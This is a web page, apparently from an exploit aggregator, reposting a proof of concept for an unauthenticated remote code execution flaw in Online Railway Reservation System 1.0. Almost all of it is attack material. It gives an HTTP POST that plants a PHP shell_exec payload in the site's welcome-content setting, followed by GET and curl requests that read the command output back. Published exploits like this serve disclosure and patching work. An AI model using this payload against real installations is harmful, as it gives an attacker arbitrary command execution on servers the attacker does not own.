Home Tools Exploits & CVE's Online Railway Reservation System 1.0 Remote Code Execution

Online Railway Reservation System 1.0 Remote Code Execution

January 10, 2022

625

Online Railway Reservation System version 1.0 suffers from an unauthenticated remote code execution vulnerability.

#Exploit Title: Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0

=====================================================================================================================================
Command Execution
=====================================================================================================================================
POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447
Content-Length: 164

-----------------------------41914587873111789572282654447
Content-Disposition: form-data; name="content[welcome]"
<?php echo shell_exec('id -a'); ?>

=====================================================================================================================================
View Output
=====================================================================================================================================
GET /orrs/ HTTP/1.1
Host: localhost
Content-Length: 2

=====================================================================================================================================
View Only STDOUT
=====================================================================================================================================
curl -i -s -k -X $'GET' 
    -H $'Host: localhost' -H $'Content-Length: 2' 
    --data-binary $'x0dx0a' 
    $'http://localhost/orrs/'| sed -n '/"welcome-content"/,/</div/p' | grep -v '<'

Online Railway Reservation System 1.0 Remote Code Execution

Follow us on Instagram @thecyberpost

EDITOR PICKS

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Gambio Online Webshop 4.9.2.0 Remote Code Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Rejetto HttpFileServer 2.3.x Remote Command Execution

Backdoor.Win32.XLog.21 Authentication Bypass / Race Condition

ICT Protege GX/WX 2.08 Cross Site Scripting